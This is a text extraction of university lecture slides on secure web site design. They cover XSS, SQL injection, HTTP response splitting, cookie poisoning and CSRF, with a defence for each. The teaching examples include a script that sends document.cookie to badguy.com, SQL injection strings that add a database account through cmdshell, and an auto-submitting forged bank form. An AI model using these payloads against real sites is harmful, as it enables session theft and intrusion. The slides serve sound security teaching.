Secure Web Site Design

1
Secure Web Site Design
CS 155
Spring 2007

• Dan Boneh

Project 2 out today
2
Vulnerability Statistics web is winning
Majority of vulnerabilities now found in web
software
Source MITRE CVE trends
3
Schematic web site architecture
WS1
Firewall
Firewall
ApplicationFirewall (WAF)
LoadBalancer
DB
AppServers
WS2
WS3
IDS
To CCprocessor
4
Web Application Firewalls

• Prevent some attacks we discuss today
• SQL Injection
• Form field tampering
• Cookie poisoning
• Some examples
• Imperva
• Kavado Interdo
• F5 TrafficShield
• Citrix NetScaler
• CheckPoint Web Intelligence

5
Our focus web app code

• Common web-site attacks
• Denial of Service later in course
• Attack the web server (IIS, Apache)
• e.g. control hijacking CodeRed, Nimda,
• Solutions
• Harden web server stackguard, libsafe,
• Worm defense later in course.
• Host based intrusion detection,
• Worm signatures generation, shields.
• Today
• Common vulnerabilities in web application code

6
Web app code

• Runs on web server or app server.
• Takes input from web users (via web server)
• Interacts with the database and 3rd parties.
• Prepares results for users (via web server)
• Examples
• Shopping carts, home banking, bill pay, tax
  prep,
• New code written for every web site.
• Written in
• C, PHP, Perl, Python, JSP, ASP,
• Often written with little consideration for
  security.

7
Background
8
HTTP Request
Method
File
HTTP version
Headers

• GET /default.asp HTTP/1.0
• Accept image/gif, image/x-bitmap, image/jpeg,
  /
• Accept-Language en
• User-Agent Mozilla/1.22 (compatible MSIE 2.0
  Windows 95)
• Connection Keep-Alive
• If-Modified-Since Sunday, 17-Apr-96 043258 GMT

Blank line
Data none for GET
GET no side effect. POST possible
side effect.
9
HTTP Response
HTTP version
Status code
Reason phrase
Headers
HTTP/1.0 200 OK Date Sun, 21 Apr 1996 022042
GMT Server Microsoft-Internet-Information-Server/
5.0 Connection keep-alive Content-Type
text/html Last-Modified Thu, 18 Apr 1996
173905 GMT Content-Length 2543 ltHTMLgt Some
data... blah, blah, blah lt/HTMLgt
Data
10
Document Object Model (DOM)

• Object-oriented interface used to read and write
  docs
• web page in HTML is structured data
• DOM provides representation of this hierarchy
• Examples
• Properties document.alinkColor, document.URL,
  document.forms , document.links ,
  document.anchors
• Methods document.write(document.referrer)
• Also Browser Object Model (BOM)
• Window, Document, Frames, History, Location,
  Navigator (type and version of browser)

11
Cookies

• Used to store state on users machine

GET
Server
Browser
HTTP Header Set-cookie NAMEVALUE domain
(who can read) expires (when expires)
secure (only over SSL)
Server
Browser
GET Cookie NAME VALUE
Http is stateless protocol cookies add state
12
Cookies

• Brower will store
• At most 20 cookies/site, 3 KB / cookie
• Uses
• User authentication
• Personalization
• User tracking e.g. Doubleclick (3rd party
  cookies)

13
Browser Same Origin Principle

• Web sites from different domains cannot interact
  except in very limited ways. Applies to
• Cookies cookie from origin A not visible to
  origin B
• Properties script from origin A cannot read or
  set properties for origin B
• Two origins are the same iff
• Domain-name, port, and protocol are equal
• https//www.example.com443/whoami
• http//www.example.com443/hello
• Note setting document.domain changes origin.
• Can only be set to suffix of domain name.

14
SOP Examples

• Example HTML at www.site.com
• Disallowed access
• ltiframe src"http//othersite.com"gtlt/iframegt
• alert( frames0.contentDocument.body.innerHTML
  )
• alert( frames0.src )
• Allowed access
• ltimg src"http//othersite.com/logo.gif"gt
• alert( images0.height )
• Note SOP allows send-only communication with
  othersite

15
Web Application Vulnerabilities
16
Common vulnerabilities (OWASP)

• Inadequate validation of user input
• Cross site scripting
• SQL Injection
• HTTP Splitting
• Broken session management
• Can lead to session hijacking and data theft
• Insecure storage
• Sensitive data stored in the clear.
• Prime target for theft e.g. egghead, Verizon.
• Note PCI Data Security Standard (Visa,
  Mastercard)

17
Warm up a simple example

• Direct use of user input
• http//victim.com/ copy.php ? nameusername
• copy.php
• Problem
• http//victim.com/ copy.php ? namea rm
• (should be namea2020rm20 )

18
Redirects

• EZShopper.com shopping cart (10/2004)
• http///cgi-bin/ loadpage.cgi ? pageurl
• Redirects browser to url
• Redirects are common on many sites
• Used to track when user clicks on external link
• EZShopper uses redirect to add HTTP headers
• Problem phishing
• http//victim.com/cgi-bin/loadpage ?
  pagephisher.com
• Link to victim.com puts user at phisher.com
• ? Local redirects should ensure target URL is
  local

19
Cross Site Scripting (XSS)
20
The setup

• User input is echoed into HTML response.
• Example search field
• http//victim.com/search.php ? term apple
• search.php responds with
• ltHTMLgt ltTITLEgt Search Results lt/TITLEgt
• ltBODYgt
• Results for lt?php echo _GETterm ?gt
• . . .
• lt/BODYgt lt/HTMLgt
• Is this exploitable?

21
Bad input

• Problem no validation of input term
• Consider link (properly URL encoded)
• http//victim.com/search.php ? term
• ltscriptgt window.open(
• http//badguy.com?cookie
• document.cookie ) lt/scriptgt
• What if user clicks on this link?
• Browser goes to victim.com/search.php
• Victim.com returns
• ltHTMLgt Results for ltscriptgt lt/scriptgt
• Browser executes script
• Sends badguy.com cookie for victim.com

22
So what?

• Why would user click on such a link?
• Phishing email in webmail client (e.g. gmail).
• Link in doubleclick banner ad
• many many ways to fool user into clicking
• What if badguy.com gets cookie for victim.com ?
• Cookie can include session auth for victim.com
• Or other data intended only for victim.com
• Violates same origin policy

23
Much worse

• Attacker can execute arbitrary scripts in browser
• Can manipulate any DOM component on victim.com
• Control links on page
• Control form fields (e.g. password field) on this
  page and linked pages.
• Example inject password field that sends
  password to bad guy.
• Can infect other users MySpace.com worm.

24
MySpace.com (Samy worm)

• Users can post HTML on their pages
• MySpace.com ensures HTML contains no
• ltscriptgt, ltbodygt, onclick, lta hrefjavascript//gt
• but can do Javascript within CSS tags
• ltdiv stylebackgroundurl(javascriptalert(1))
  gt
• And can hide javascript as java\nscript
• With careful javascript hacking
• Samys worm infects anyone who visits an
  infected MySpace page and adds Samy as a
  friend.
• Samy had millions of friends within 24 hours.
• More info http//namb.la/popular/tech.html

25
Avoiding XSS bugs (PHP)

• Main problem
• Input checking is difficult --- many ways to
  inject scripts into HTML.
• Preprocess input from user before echoing it
• PHP htmlspecialchars(string)
• ? amp " ? quot ' ? 039
  lt ? lt gt ? gt
• htmlspecialchars( "lta href'test'gtTestlt/agt",
  ENT_QUOTES)
• Outputs lta href039test039gtTest
  lt/agt

26
Avoiding XSS bugs (ASP.NET)

• ASP.NET 1.1
• Server.HtmlEncode(string)
• Similar to PHP htmlspecialchars
• validateRequest (on by default)
• Crashes page if finds ltscriptgt in POST data.
• Looks for hardcoded list of patterns.
• Can be disabled
• lt_at_ Page validateRequestfalse"  gt

27
(No Transcript)
28
httpOnly Cookies (IE)
GET
Server
Browser
HTTP Header Set-cookie NAMEVALUE HttpOnly

• Cookie sent over HTTP(s), but not accessible
  to scripts
• cannot be read via document.cookie
• Helps prevent cookie theft via XSS
• but does not stop most other risks of XSS
  bugs.

29
SQL Injection
30
The setup

• User input is used in SQL query
• Example login page (ASP)
• set ok execute(SELECT FROM UserTable
• WHERE username' form(user)
• ' AND password' form(pwd) ' )
• If not ok.EOF
• login success
• else fail
• Is this exploitable?

31
Bad input

• Suppose user ' or 1 1 -- (URL
  encoded)
• Then scripts does
• ok execute( SELECT
• WHERE username ' ' or 11 -- )
• The -- causes rest of line to be ignored.
• Now ok.EOF is always false.
• The bad news easy login to many sites this
  way.

32
Even worse

• Suppose user
• ' exec cmdshell
• 'net user badguy badpwd' / ADD --
• Then script does
• ok execute( SELECT
• WHERE username ' ' exec )
• If SQL server context runs as sa, attacker gets
  account on DB server.

33
Avoiding SQL injection

• Build SQL queries by properly escaping args '
  ? \'
• Example Parameterized SQL (ASP.NET 1.1)
• Ensures SQL arguments are properly escaped.
• SqlCommand cmd new SqlCommand( "SELECT
  FROM UserTable WHERE username _at_User AND
  password _at_Pwd", dbConnection)
• cmd.Parameters.Add("_at_User", Requestuser )
• cmd.Parameters.Add("_at_Pwd", Requestpwd )
• cmd.ExecuteReader()
• In PHP bound parameters -- similar function

34
PHP addslashes()

• PHP addslashes( or 1 1 -- )
• outputs \ or 11 --
• Unicode attack (GBK)
• user 0x bf 27
• addslashes (user) ? 0x bf 5c 27 ?
• Correct implementation mysql_real_escape_string
  ()

35
HTTP Response Splitting
36
The setup

• User input echoed in HTTP header.
• Example Language redirect page (JSP)
• lt response.redirect(/by_lang.jsp?lang
  request.getParameter(lang) ) gt
• Browser sends http//.../by_lang.jsp ?
  langfrench
• Server HTTP Response
• HTTP/1.1 302 (redirect)
• Date
• Location /by_lang.jsp ? langfrench
• Is this exploitable?

37
Bad input

• Suppose browser sends
• http//.../by_lang.jsp ? lang
• french \n
• Content-length 0 \r\n\r\n
• HTTP/1.1 200 OK
• Spoofed page (URL encoded)

38
Bad input

• HTTP response from server looks like
• HTTP/1.1 302 (redirect)
• Date
• Location /by_lang.jsp ? lang french
• Content-length 0
• HTTP/1.1 200 OK
• Content-length 217
• Spoofed page

lang
39
So what?

• What just happened
• Attacker submitted bad URL to victim.com
• URL contained spoofed page in it
• Got back spoofed page
• So what?
• Cache servers along path now store spoof of
  victim.com
• Will fool any user using same cache server
• Defense dont do that.

40
Summary thus far
41
App code

• Little programming knowledge can be dangerous
• Cross site scripting
• SQL Injection
• HTTP Splitting
• What to do?
• Band-aid Web App Firewall (WAF)
• Looks for attack patterns and blocks requests
• False positive / false negatives
• Code checking

42
Code checking

• Blackbox security testing services
• Whitehatsec.com
• Automated blackbox testing tools
• Cenzic, Hailstorm
• Spidynamic, WebInspect
• eEye, Retina
• Web application hardening tools
• WebSSARI WWW04 based on information
  flow
• Nguyen-Tuong IFIP05 based on tainting

43
Session Management

• Cookies, hidden fields, and user authentication

44
Cookies

• Used to store state on users machine

GET
Server
Browser
HTTP Header Set-cookie NAMEVALUE domain
(who can read) expires (when expires)
secure (only over SSL)
Server
Browser
GET Cookie NAME VALUE
Http is stateless protocol cookies add state
45
Cookie risks

• Danger of storing data on browser
• User can change values
• Silly example Shopping cart software.
• Set-cookie shopping-cart-total 150 ()
• User edits cookie file (cookie poisoning)
• Cookie shopping-cart-total 15 ()
• bargain shopping.
• Similar behavior with hidden fields
• ltINPUT TYPEhidden NAMEprice VALUE150gt

46
Not so silly (as of 2/2005)

• D3.COM Pty Ltd ShopFactory 5.8
• _at_Retail Corporation _at_Retail
• Adgrafix Check It Out
• Baron Consulting Group WebSite Tool
• ComCity Corporation SalesCart
• Crested Butte Software EasyCart
• Dansie.net Dansie Shopping Cart
• Intelligent Vending Systems Intellivend
• Make-a-Store Make-a-Store OrderPage
• McMurtrey/Whitaker Associates Cart32 3.0
• pknutsen_at_nethut.no CartMan 1.04
• Rich Media Technologies JustAddCommerce 5.0
• SmartCart SmartCart
• Web Express Shoptron 1.2
• Source http//xforce.iss.net/xforce/xfdb/4621

47
Example dansie.net shopping cart

• http//www.dansie.net/demo.html (May, 2006)
• ltFORM METHODPOST
• ACTION"http//www.dansie.net/cgi-bin/scripts/car
  t.pl"gt
• Black Leather purse with leather
  strapsltBRgtPrice 20.00ltBRgt
• ltINPUT TYPEHIDDEN NAMEname VALUE"Black
  leather purse"gt ltINPUT TYPEHIDDEN NAMEprice
  VALUE"20.00"gt ltINPUT TYPEHIDDEN NAMEsh
  VALUE"1"gt ltINPUT TYPEHIDDEN NAMEimg
  VALUE"purse.jpg"gt ltINPUT TYPEHIDDEN
  NAMEreturn VALUE"http//www.dansie.net/demo.
  html"gt ltINPUT TYPEHIDDEN NAMEcustom1
  VALUE"Black leather purse with leather straps"gt
• ltINPUT TYPESUBMIT NAME"add" VALUE"Put in
  Shopping Cart"gt
• lt/FORMgt
• CVE-2000-0253 (Jan. 2001), BugTraq ID 1115

48
Solution

• When storing state on browser MAC data using
  server secret key.
• .NET 2.0
• System.Web.Configuration.MachineKey
• Secret web server key intended for cookie
  protection
• HttpCookie cookie new HttpCookie(name, val)
  HttpCookie encodedCookie HttpSecureCookie.
  Encode (cookie)
• HttpSecureCookie.Decode (cookie)

49
Cookie authentication
Browser
Web Server
Auth server
Check val
50
Weak authenticators security risk

• Predictable cookie authenticator
• Verizon Wireless - counter
• Valid user logs in, gets counter, can view
  sessions of other users.
• Weak authenticator generation Fu et al. 01
• WSJ.com cookie user, MACk(user)
• Weak MAC exposes K from few cookies.
• Apache Tomcat generateSessionID()
• MD5(PRNG) but weak PRNG GM05.
• Predictable SessionIDs

51
Cross Site Request Forgery

• Example
• User logs in to bank.com. Forgets to sign
  off.
• Session cookie remains in browser state
• Then user visits another site containing
• ltform nameF actionhttp//bank.com/BillPay.ph
  pgt
• ltinput namerecipient valuebadguygt
• ltscriptgt document.F.submit() lt/scriptgt
• Browser sends user auth cookie with request
• Transaction will be fulfilled
• Problem
• cookie auth is insufficient when side effects can
  happen
• Correct use use cookies hidden fields

52
Take home message

• On the web
• Little programming knowledge can be a
  dangerous thing

53
THE END